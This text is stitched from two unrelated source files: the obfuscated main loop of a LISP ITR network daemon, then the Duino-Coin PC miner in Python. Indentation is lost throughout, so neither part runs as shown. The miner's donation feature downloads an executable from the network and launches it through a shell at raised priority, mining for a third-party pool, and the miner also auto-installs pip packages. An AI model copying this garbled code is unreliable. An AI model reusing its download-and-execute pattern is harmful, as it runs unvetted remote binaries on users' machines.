if 38 - 38: I1Ii111 . iII111i . I1IiiI * OoO0O00
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii / Ii1I
if 93 - 93: ooOoO0o
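# Appears to be the main entry sequence: run the ITR startup routine, then
# select() over the control, IPC and punt sockets, dispatching RLOC-probe
# replies, Map-Replies, configuration and "show" commands, API requests and
# punted data packets until the loop breaks, after which the shutdown helper
# runs and the process exits.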
if ( I111I1Iiii1i ( ) == False ) :
lisp . lprint ( "lisp_itr_startup() failed" )
lisp . lisp_print_banner ( "ITR abnormal exit" )
exit ( 1 )
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
IiI = [ i111I , oO0oIIII ,
II1Ii1iI1i , Oo0oO0oo0oO00 ]
if 4 - 4: OoooooooOO + ooOoO0o . i1IIi / O0 - O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
iiI = True
O0OO0o0O00oO = [ i111I ] * 3
o00O = [ II1Ii1iI1i ] * 3
if 92 - 92: Oo0Ooo - I1Ii111
while ( True ) :
try : IIi11 , o0O0oo0 , oOOoo = select . select ( IiI , [ ] , [ ] )
except : break
if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
if 75 - 75: IiII % i11iIiiIii + iIii1I11I1II1
if 92 - 92: OoOoOO00 % O0
if 55 - 55: iIii1I11I1II1 * iII111i
if ( lisp . lisp_ipc_data_plane and Oo0oO0oo0oO00 in IIi11 ) :
lisp . lisp_process_punt ( Oo0oO0oo0oO00 , II1iII1i ,
iiI1iIiI )
if 85 - 85: iIii1I11I1II1 . II111iiii
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if ( i111I in IIi11 ) :
I1oo , o0OO0 , oOo00Oo0o0Oo , ooo0OoO = lisp . lisp_receive ( O0OO0o0O00oO [ 0 ] ,
False )
if ( o0OO0 == "" ) : break
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if ( lisp . lisp_is_rloc_probe_reply ( ooo0OoO [ 0 : 1 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 94 - 94: i1IIi
lisp . lisp_parse_packet ( O0OO0o0O00oO , ooo0OoO , o0OO0 , oOo00Oo0o0Oo )
if 36 - 36: I1IiiI + Oo0Ooo
if 46 - 46: iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if ( II1Ii1iI1i in IIi11 ) :
I1oo , o0OO0 , oOo00Oo0o0Oo , ooo0OoO = lisp . lisp_receive ( o00O [ 0 ] ,
False )
if ( o0OO0 == "" ) : break
if 65 - 65: ooOoO0o - i1IIi
if ( lisp . lisp_is_rloc_probe_reply ( ooo0OoO [ 0 : 1 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe reply, using pcap" )
continue
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
OooO0O0Ooo = lisp . lisp_parse_packet ( o00O , ooo0OoO , o0OO0 , oOo00Oo0o0Oo )
if 85 - 85: o0oOOo0O0Ooo / I1Ii111
if 67 - 67: I11i % oO0o
if 39 - 39: i11iIiiIii + IiII
if 7 - 7: iIii1I11I1II1 - i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if ( OooO0O0Ooo ) :
OOOOO0o0OOo = [ i111I , i111I ]
lisp . lisp_start_rloc_probe_timer ( 0 , OOOOO0o0OOo )
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
if 40 - 40: o0oOOo0O0Ooo + I11i
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if ( oO0oIIII in IIi11 ) :
I1oo , o0OO0 , oOo00Oo0o0Oo , ooo0OoO = lisp . lisp_receive ( oO0oIIII , True )
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if ( o0OO0 == "" ) : break
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if ( I1oo == "command" ) :
ooo0OoO = ooo0OoO . decode ( )
if ( ooo0OoO == "clear" ) :
lisp . lisp_clear_map_cache ( )
continue
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if ( ooo0OoO . find ( "nonce%" ) != - 1 ) :
I1i1II1 ( ooo0OoO )
continue
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
lispconfig . lisp_process_command ( oO0oIIII , I1oo ,
ooo0OoO , "lisp-itr" , [ o00000oo00 ] )
elif ( I1oo == "api" ) :
ooo0OoO = ooo0OoO . decode ( )
lisp . lisp_process_api ( "lisp-itr" , oO0oIIII , ooo0OoO )
elif ( I1oo == "data-packet" ) :
ii1iii1I1I ( ooo0OoO , "ipc" )
else :
if ( lisp . lisp_is_rloc_probe_reply ( ooo0OoO [ 0 : 1 ] ) ) :
lisp . lprint ( "ITR ignoring RLOC-probe request, using pcap" )
continue
if 26 - 26: OOooOOo * Oo0Ooo
lisp . lisp_parse_packet ( II1iII1i , ooo0OoO , o0OO0 , oOo00Oo0o0Oo )
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
i1i1i1I ( )
lisp . lisp_print_banner ( "ITR normal exit" )
exit ( 0 )
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
PC_Miner.py
#!/usr/bin/env python3
"""
Duino-Coin Official PC Miner 2.73 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from time import time, sleep, strptime, ctime
from hashlib import sha1
from socket import socket
from multiprocessing import Lock as thread_lock
from multiprocessing import cpu_count, current_process
from multiprocessing import Process, Manager
from threading import Thread
from datetime import datetime
from random import randint
from os import execl, mkdir, _exit
from subprocess import DEVNULL, Popen, check_call
import pip
import sys
import os
import json
import requests
from pathlib import Path
from re import sub
from random import choice
from platform import machine as osprocessor
from signal import SIGINT, signal
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from configparser import ConfigParser
configparser = ConfigParser()
def handler(signal_received, frame):
"""
Nicely handle CTRL+C exit
"""
if current_process().name == "MainProcess":
pretty_print(
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
_exit(0)
def install(package):
"""
Automatically installs python pip package and restarts the program
"""
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
try:
from xxhash import xxh64
xxhash_en = True
except ModuleNotFoundError:
print("Xxhash is not installed - this mining algorithm will be disabled")
xxhash_en = False
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
import cpuinfo
except ModuleNotFoundError:
print("Cpuinfo is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install py-cpuinfo")
install("py-cpuinfo")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
class Settings:
"""
Class containing default miner and server settings
"""
ENCODING = "UTF8"
SEPARATOR = ","
VER = 2.73
DATA_DIR = "Duino-Coin PC Miner " + str(VER)
TRANSLATIONS = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
TRANSLATIONS_FILE = "/Translations.json"
SETTINGS_FILE = "/Settings.cfg"
SOC_TIMEOUT = 15
REPORT_TIME = 50
DONATE_LVL = 0
BLOCK = " ‖ "
PICK = ""
COG = " @"
if os.name != "nt" or bool(os.name == "nt" and os.environ.get("WT_SESSION")):
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Algorithms:
"""
Class containing algorithms used by the miner
For more info about the implementation refer to the Duino whitepaper:
https://github.com/revoxhere/duino-coin/blob/gh-pages/assets/whitepaper.pdf
"""
def DUCOS1(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
base_hash = sha1(last_h.encode('ascii'))
for nonce in range(100 * diff + 1):
temp_h = base_hash.copy()
temp_h.update(str(nonce).encode('ascii'))
d_res = temp_h.hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
def XXHASH(last_h: str, exp_h: str, diff: int, eff: int):
time_start = time()
for nonce in range(100 * diff + 1):
d_res = xxh64(last_h + str(nonce),
seed=2811).hexdigest()
if d_res == exp_h:
time_elapsed = time() - time_start
hashrate = nonce / time_elapsed
return [nonce, hashrate]
return [0, 0]
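# A minimal, self-contained sketch of the DUCOS1 job/solve cycle (not part of
# the original miner and never called by it): the job values below are
# hypothetical and generated locally the same way a pool would, purely to
# illustrate the nonce search implemented above.
def _ducos1_example():
    last_h = "example_block_hash"   # hypothetical previous block hash
    hidden_nonce = 417              # hypothetical solution chosen by the pool
    exp_h = sha1((last_h + str(hidden_nonce)).encode("ascii")).hexdigest()
    nonce, hashrate = Algorithms.DUCOS1(last_h, exp_h, diff=10, eff=0)
    assert nonce == hidden_nonce
    return nonce, hashrate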
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
global s
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
def send(msg: str):
        # socket.sendall() returns None on success and raises on error
        s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
"""
Fetches best pool from the /getPool API endpoint
"""
while True:
pretty_print(" " + get_string("connection_search"),
"warning", "net0")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(10)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print(f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error", "net0")
sleep(15)
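# Rough shape of how the Client helpers above are used elsewhere in the miner
# (sketch only; the exact message formats are defined by the Duino-Coin
# protocol, not by this comment):
#   Client.connect(Client.fetch_pool())   # open a socket to the best node
#   server_version = Client.recv(6)       # the node greets with its version
#   Client.send(...)                      # then job requests / shares follow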
class Donate:
def load(donation_level):
if donation_level > 0:
if os.name == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif os.name == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if os.name == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
elif os.name == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*10}')
if donation_level <= 0:
pretty_print(
Fore.YELLOW + get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning', 'sys0')
sleep(5)
if donation_level > 0:
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print(get_string('thanks_donation').replace("\n", "\n\t\t"),
'error', 'sys0')
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
val = str(round((val / 1_000))) + " k"
else:
val = str(round(val)) + " "
return val + symbol
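# A few example conversions with the helper above (arbitrary values). Note
# that the kilo branch rounds to a whole number, while the mega/giga/tera
# branches honour the `accuracy` argument.
def _get_prefix_examples():
    return [
        get_prefix("H/s", 950, 2),            # "950 H/s"
        get_prefix("H/s", 1_234, 2),          # "1 kH/s"
        get_prefix("H/s", 2_500_000, 2),      # "2.5 MH/s"
        get_prefix("H/s", 3_200_000_000, 2),  # "3.2 GH/s"
    ]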
def periodic_report(start_time, end_time,
shares, hashrate, uptime):
"""
    Displays nicely formatted uptime stats
"""
seconds = round(end_time - start_time)
pretty_print(get_string("periodic_mining_report")
+ Fore.RESET + Style.NORMAL
+ get_string("report_period")
+ str(seconds) + get_string("report_time")
+ get_string("report_body1")
+ str(shares) + get_string("report_body2")
+ str(round(shares/seconds, 1))
+ get_string("report_body3")
+ get_string("report_body4")
+ str(get_prefix("H/s", hashrate, 2))
+ get_string("report_body5")
+ str(int(hashrate*seconds))
+ get_string("report_body6")
+ get_string("total_mining_time")
+ str(uptime), "success")
def calculate_uptime(start_time):
"""
Returns seconds, minutes or hours passed since timestamp
"""
uptime = time() - start_time
    if uptime < 60:
        return str(round(uptime)) + get_string("uptime_seconds")
    elif uptime < 120:
        return str(round(uptime // 60)) + get_string("uptime_minute")
    elif uptime < 3600:
        return str(round(uptime // 60)) + get_string("uptime_minutes")
    elif uptime < 7200:
        return str(round(uptime // 3600)) + get_string("uptime_hour")
    else:
        return str(round(uptime // 3600)) + get_string("uptime_hours")
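# Small illustration of the helper above (assumes Miner.preload() has loaded
# the language file so get_string() can resolve the unit suffixes):
def _uptime_example():
    started_125_s_ago = time() - 125
    # 125 seconds -> "2" + the "uptime_minutes" suffix from the language file
    return calculate_uptime(started_125_s_ago)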
def pretty_print(msg: str = None,
state: str = "success",
sender: str = "sys0"):
"""
Produces nicely formatted CLI output for messages:
    HH:MM:SS |sender| msg
"""
if sender.startswith("net"):
bg_color = Back.BLUE
elif sender.startswith("cpu"):
bg_color = Back.YELLOW
elif sender.startswith("sys"):
bg_color = Back.GREEN
if state == "success":
fg_color = Fore.GREEN
elif state == "error":
fg_color = Fore.RED
else:
fg_color = Fore.YELLOW
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT + bg_color + " " + sender + " "
+ Back.RESET + " " + fg_color + msg.strip())
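# Example calls (assuming colorama and the thread_lock() helper defined
# earlier in this file are initialised, as they are when the miner runs);
# each prints one line in the "HH:MM:SS  sender  message" format above:
def _pretty_print_demo():
    pretty_print("starting benchmark", "warning", "sys0")
    pretty_print("benchmark finished", "success", "sys0")
    pretty_print("connection lost", "error", "net0")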
def share_print(id, type,
accept, reject,
hashrate, total_hashrate,
computetime, diff, ping,
back_color):
"""
Produces nicely formatted CLI output for shares:
    HH:MM:SS |cpuN| ⛏ Accepted 0/0 (100%) ∙ 0.0s ∙ 0 kH/s ⚙ diff 0 k ∙ ping 0ms
"""
total_hashrate = get_prefix("H/s", total_hashrate, 2)
diff = get_prefix("", int(diff), 0)
if type == "accept":
share_str = get_string("accepted")
fg_color = Fore.GREEN
elif type == "block":
share_str = get_string("block_found")
fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + back_color + Fore.RESET
+ " cpu" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def get_string(string_name):
"""
Gets a string from the language file
"""
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
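# The lookup order above is: selected language first, then the english
# section, then a "String not found" marker. A standalone illustration with
# a stub dictionary (the real file is downloaded by Miner.preload()):
def _get_string_fallback_demo():
    stub = {"english": {"wallet": "wallet"}, "polish": {}}
    def lookup(name, lang="polish", lang_file=stub):
        if name in lang_file[lang]:
            return lang_file[lang][name]
        elif name in lang_file["english"]:
            return lang_file["english"][name]
        return "String not found: " + name
    return lookup("wallet"), lookup("no_such_key")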
class Miner:
def greeting():
diff_str = get_string("net_diff_short")
if user_settings["start_diff"] == "LOW":
diff_str = get_string("low_diff_short")
elif user_settings["start_diff"] == "MEDIUM":
diff_str = get_string("medium_diff_short")
current_hour = strptime(ctime(time())).tm_hour
greeting = get_string("greeting_back")
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
print("\n" + Style.DIM + Fore.YELLOW + Settings.BLOCK + Fore.YELLOW
+ Style.BRIGHT + get_string("banner") + Style.RESET_ALL
+ Fore.MAGENTA + " (" + str(Settings.VER) + ") "
+ Fore.RESET + "2019-2021")
print(Style.DIM + Fore.YELLOW + Settings.BLOCK + Style.NORMAL
+ Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + lang.capitalize()
+ " translation: " + Fore.YELLOW
+ get_string("translation_autor"))
try:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x " + str(cpu["brand_raw"]))
except:
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + "CPU: " + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["threads"])
+ "x threads")
if os.name == "nt" or os.name == "posix":
print(Style.DIM + Fore.YELLOW
+ Settings.BLOCK + Style.NORMAL + Fore.RESET
+ get_string("donation_level") + Style.BRIGHT
+ Fore.YELLOW + str(user_settings["donate"]))
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("algorithm")
+ Style.BRIGHT + Fore.YELLOW + user_settings["algorithm"]
+ Settings.COG + " " + diff_str)
if user_settings["identifier"] != "None":
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + get_string("rig_identifier")
+ Style.BRIGHT + Fore.YELLOW + user_settings["identifier"])
print(Style.DIM + Fore.YELLOW + Settings.BLOCK
+ Style.NORMAL + Fore.RESET + str(greeting)
+ ", " + Style.BRIGHT + Fore.YELLOW
+ str(user_settings["username"]) + "!\n")
def preload():
"""
Creates needed directories and files for the miner
"""
global lang_file
global lang
if not Path(Settings.DATA_DIR).is_dir():
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE).is_file():
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE,
"wb") as f:
f.write(requests.get(Settings.TRANSLATIONS).content)
with open(Settings.DATA_DIR + Settings.TRANSLATIONS_FILE, "r",
encoding=Settings.ENCODING) as file:
lang_file = json.load(file)
try:
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
                elif locale.startswith("pt"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
try:
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
lang = configparser["PC Miner"]["language"]
except Exception:
lang = "english"
except Exception as e:
print("Error with lang file, falling back to english: " + str(e))
lang = "english"
def load_cfg():
"""
Loads miner settings file or starts the config tool
"""
if not Path(Settings.DATA_DIR + Settings.SETTINGS_FILE).is_file():
print(get_string("basic_config_tool")
+ Settings.DATA_DIR
+ get_string("edit_config_file_warning")
+ "\n"
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(get_string("ask_username") + Style.BRIGHT)
if not username:
username = choice(["revox", "Bilaboz", "JoyBed", "Connor2"])
algorithm = "DUCO-S1"
if xxhash_en:
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - DUCO-S1 ("
+ get_string("recommended")
+ ")\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - XXHASH")
prompt = sub(r"\D", "",
input(get_string("ask_algorithm")
+ Style.BRIGHT))
if prompt == "2":
algorithm = "XXHASH"
intensity = 100 # None
##
# intensity = sub(r"\D", "",
# input(Style.NORMAL
## + get_string("ask_intensity")
# + Style.BRIGHT))
# if not intensity:
## intensity = 95
# elif float(intensity) > 100:
## intensity = 100
# elif float(intensity) < 1:
## intensity = 1
threads = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_threads")
+ str(cpu_count()) + "): " + Style.BRIGHT))
if not threads:
threads = cpu_count()
if int(threads) > 8:
threads = 8
pretty_print(
Style.BRIGHT
+ get_string("max_threads_notice"))
elif int(threads) < 1:
threads = 1
print(Style.BRIGHT
+ "1" + Style.NORMAL + " - " + get_string("low_diff")
+ "\n" + Style.BRIGHT
+ "2" + Style.NORMAL + " - " + get_string("medium_diff")
+ "\n" + Style.BRIGHT
+ "3" + Style.NORMAL + " - " + get_string("net_diff"))
start_diff = sub(r"\D", "",
input(Style.NORMAL + get_string("ask_difficulty")
+ Style.BRIGHT))
if start_diff == "1":
start_diff = "LOW"
elif start_diff == "3":
start_diff = "NET"
else:
start_diff = "MEDIUM"
rig_id = input(Style.NORMAL + get_string("ask_rig_identifier")
+ Style.BRIGHT)
if rig_id.lower() == "y":
rig_id = str(input(Style.NORMAL + get_string("ask_rig_name")
+ Style.BRIGHT))
else:
rig_id = "None"
donation_level = '0'
if os.name == 'nt' or os.name == 'posix':
donation_level = input(Style.NORMAL
+ get_string('ask_donation_level')
+ Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
configparser["PC Miner"] = {
"username": username,
"intensity": intensity,
"threads": threads,
"start_diff": start_diff,
"donate": int(donation_level),
"identifier": rig_id,
"algorithm": algorithm,
"language": lang,
"soc_timeout": Settings.SOC_TIMEOUT,
"report_sec": Settings.REPORT_TIME,
"discord_rp": "y"}
with open(Settings.DATA_DIR + Settings.SETTINGS_FILE,
"w") as configfile:
configparser.write(configfile)
print(Style.RESET_ALL + get_string("config_saved"))
configparser.read(Settings.DATA_DIR
+ Settings.SETTINGS_FILE)
return configparser["PC Miner"]
def m_connect(id, pool):
retry_count = 0
while True:
try:
if retry_count > 3:
pool = Client.fetch_pool()
retry_count = 0
socket_connection = Client.connect(pool)
POOL_VER = Client.recv(5)
if id == 0:
Client.send("MOTD")
motd = Client.recv(512).replace("\n", "\n\t\t")
pretty_print("MOTD: " + Fore.RESET + Style.NORMAL
+ str(motd), "success", "net" + str(id))
if float(POOL_VER) <= Settings.VER:
pretty_print(get_string("connected") + Fore.RESET
+ Style.NORMAL +
get_string("connected_server")
+ str(POOL_VER) + ", " + pool[0] + ":"
+ str(pool[1]) + ")", "success",
"net" + str(id))
else:
pretty_print(get_string("outdated_miner")
+ str(Settings.VER) + ") -"
+ get_string("server_is_on_version")
+ str(POOL_VER) + Style.NORMAL
+ Fore.RESET +
get_string("update_warning"),
"warning", "net" + str(id))
sleep(5)
break
            except Exception as e:
                pretty_print(get_string('connecting_error')
                             + Style.NORMAL + f' (connection err: {e})',
                             'error', 'net0')
                retry_count += 1
                sleep(10)
def mine(id: int, user_settings: list,
pool: tuple,
accept: int, reject: int,
hashrate: list,
single_miner_id: str):
"""
Main section that executes the functionalities from the sections above.
"""
using_algo = get_string("using_algo")
if user_settings["algorithm"] == "XXHASH":
using_algo = get_string("using_algo_xxh")
pretty_print(get_string("mining_thread") + str(id)
+ get_string("mining_thread_starting")
+ Style.NORMAL + Fore.RESET + using_algo + Fore.YELLOW
+ str(user_settings["intensity"])
+ "% " + get_string("efficiency"),
"success", "sys"+str(id))
last_report = time()
r_shares, last_shares = 0, 0
while True:
try:
Miner.m_connect(id, pool)
while True:
try:
while True:
job_req = "JOB"
if user_settings["algorithm"] == "XXHASH":
job_req = "JOBXX"
Client.send(job_req
+ Settings.SEPARATOR
+ str(user_settings["username"])
+ Settings.SEPARATOR
+ str(user_settings["start_diff"]))
job = Client.recv().split(Settings.SEPARATOR)
if len(job) == 3:
break
else:
pretty_print(
"Node message: " + str(job[1]),
"warning")
sleep(3)
while True:
time_start = time()
if user_settings["algorithm"] == "XXHASH":
back_color = Back.CYAN
result = Algorithms.XXHASH(
job[0], job[1], int(job[2]),
user_settings["intensity"])
else:
back_color = Back.YELLOW
result = Algorithms.DUCOS1(
job[0], job[1], int(job[2]),
user_settings["intensity"])
computetime = time() - time_start
hashrate[id] = result[1]
total_hashrate = sum(hashrate.values())
while True:
Client.send(f"{result[0]}"
+ Settings.SEPARATOR
+ f"{result[1]}"
+ Settings.SEPARATOR
+ "Official PC Miner"
+ f" {Settings.VER}"
+ Settings.SEPARATOR
+ f"{user_settings['identifier']}"
+ Settings.SEPARATOR
+ Settings.SEPARATOR
+ f"{single_miner_id}")
time_start = time()
feedback = Client.recv(
).split(Settings.SEPARATOR)
ping = (time() - time_start) * 1000
if feedback[0] == "GOOD":
accept.value += 1
share_print(id, "accept",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BLOCK":
reject.value += 1
share_print(id, "block",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
elif feedback[0] == "BAD":
reject.value += 1
share_print(id, "reject",
accept.value, reject.value,
result[1], total_hashrate,
computetime, job[2], ping,
back_color)
if id == 0:
end_time = time()
elapsed_time = end_time - last_report
if elapsed_time >= Settings.REPORT_TIME:
r_shares = accept.value - last_shares
uptime = calculate_uptime(
mining_start_time)
periodic_report(last_report, end_time,
r_shares,
sum(hashrate.values()),
uptime)
last_report = time()
last_shares = accept.value
break
break
except Exception as e:
pretty_print(get_string("error_while_mining")
+ " " + str(e), "error", "net" + str(id))
sleep(5)
break
except Exception as e:
pass
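# One round of the share protocol driven by Miner.mine() above, written out
# linearly for reference (assumes Client.connect() has already been called
# and Miner.preload() has run; uses the same comma-separated wire format as
# the loop above, including the empty field before the miner id):
def _single_share_round(username, rig_id="None", miner_id="0"):
    Client.send("JOB" + Settings.SEPARATOR + str(username)
                + Settings.SEPARATOR + "MEDIUM")
    last_h, exp_h, diff = Client.recv().split(Settings.SEPARATOR)
    nonce, hashrate = Algorithms.DUCOS1(last_h, exp_h, int(diff), 100)
    Client.send(f"{nonce}{Settings.SEPARATOR}{hashrate}{Settings.SEPARATOR}"
                + f"Official PC Miner {Settings.VER}{Settings.SEPARATOR}"
                + f"{rig_id}{Settings.SEPARATOR}{Settings.SEPARATOR}{miner_id}")
    return Client.recv().split(Settings.SEPARATOR)[0]  # "GOOD", "BAD" or "BLOCK"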
class Discord_rp:
def connect():
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
Thread(target=Discord_rp.update).start()
except Exception as e:
#print("Error launching Discord RPC thread: " + str(e))
pass
def update():
while True:
try:
